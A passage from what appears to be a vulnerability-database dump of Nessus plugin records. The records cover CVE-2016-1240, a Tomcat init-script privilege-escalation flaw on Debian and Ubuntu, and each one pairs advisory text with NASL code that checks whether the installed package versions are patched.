if (deb_check(release:\"7.0\", prefix:\"libtomcat7-java\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-admin\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-common\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-docs\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-examples\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-user\", reference:\"7.0.28-4+deb7u6\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:32:12", "description": "Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



For Debian 7 'Wheezy', these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DLA-622-1 : tomcat6 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc", "p-cpe:/a:debian:debian_linux:tomcat6", "p-cpe:/a:debian:debian_linux:libservlet2.4-java", "p-cpe:/a:debian:debian_linux:tomcat6-common", "p-cpe:/a:debian:debian_linux:tomcat6-docs", "p-cpe:/a:debian:debian_linux:libtomcat6-java", "p-cpe:/a:debian:debian_linux:tomcat6-extras", "p-cpe:/a:debian:debian_linux:tomcat6-user", "p-cpe:/a:debian:debian_linux:tomcat6-admin", "p-cpe:/a:debian:debian_linux:libservlet2.5-java", "p-cpe:/a:debian:debian_linux:tomcat6-examples", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-622.NASL", "href": "https://www.tenable.com/plugins/nessus/93544", "sourceData": "#%NASL_MIN_LEVEL 80502

#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DLA-622-1. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93544);

script_version(\"2.9\");

script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");



script_cve_id(\"CVE-2016-1240\");



script_name(english:\"Debian DLA-622-1 : tomcat6 security update\");

script_summary(english:\"Checks dpkg output for the updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



For Debian 7 'Wheezy', these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.\"

);

# http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es

script_set_attribute(

attribute:\"see_also\",

value:\"http://www.nessus.org/u?c0b304c1\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00015.html\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/wheezy/tomcat6\"

);

script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.4-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat6-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-admin\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-common\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-docs\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-examples\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-extras\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat6-user\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.4-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet2.5-java-doc\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libtomcat6-java\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-admin\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-common\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-docs\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-examples\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-extras\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat6-user\", reference:\"6.0.45+dfsg-1~deb7u2\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T06:07:32", "description": "Dawid Golunski discovered that the Tomcat init script incorrectly

handled creating log files. A remote attacker could possibly use this

issue to obtain root privileges. (CVE-2016-1240)



This update also reverts a change in behaviour introduced in

USN-3024-1 by setting mapperContextRootRedirectEnabled to True by

default.



Note that Tenable Network Security has extracted the preceding

description block directly from the Ubuntu security advisory. Tenable

has attempted to automatically clean and format it as much as possible

without introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-20T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:tomcat6", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat8", "p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat7", "p-cpe:/a:canonical:ubuntu_linux:libtomcat6-java", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3081-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93600", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Ubuntu Security Notice USN-3081-1. The text

# itself is copyright (C) Canonical, Inc. See

# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered

# trademark of Canonical, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93600);

script_version(\"2.8\");

script_cvs_date(\"Date: 2019/09/18 12:31:46\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"USN\", value:\"3081-1\");



script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : tomcat6, tomcat7, tomcat8 vulnerability (USN-3081-1)\");

script_summary(english:\"Checks dpkg output for updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:

\"The remote Ubuntu host is missing one or more security-related

patches.\